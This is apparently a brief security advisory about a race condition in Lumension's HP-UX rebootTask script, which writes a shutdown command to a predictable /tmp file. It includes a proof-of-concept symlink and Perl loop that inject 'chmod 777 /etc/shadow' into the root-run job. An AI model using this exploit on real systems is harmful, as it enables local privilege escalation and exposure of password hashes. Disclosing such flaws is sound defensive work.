http://lumension.com/patch-management.jsp?rpLangCode=1&rpMenuId=118443


The script rebootTask contains the following lines for HP-UX Shutdown and reboot:

<code>
 echo "shutdown -r -y 120" > /tmp/plshutdown
    chmod 500 /tmp/plshutdown
    at now < /tmp/plshutdown
</code>
A race condition exists where a local user could symlink /tmp/plshutdown to a file in their home
directory and inject malicous code.  This could be done possibly by continuously writing to the file
while waiting for the at command to run.  
<code>
$ ln -s /tmp/plshutdown /var/tmp/runme

#/bin/perl
while(1){
`echo "chmod 777 /etc/shadow" > /var/tmp/runme`;
}
</code>

My initial testing determined that this is indeed exploitable.</pre>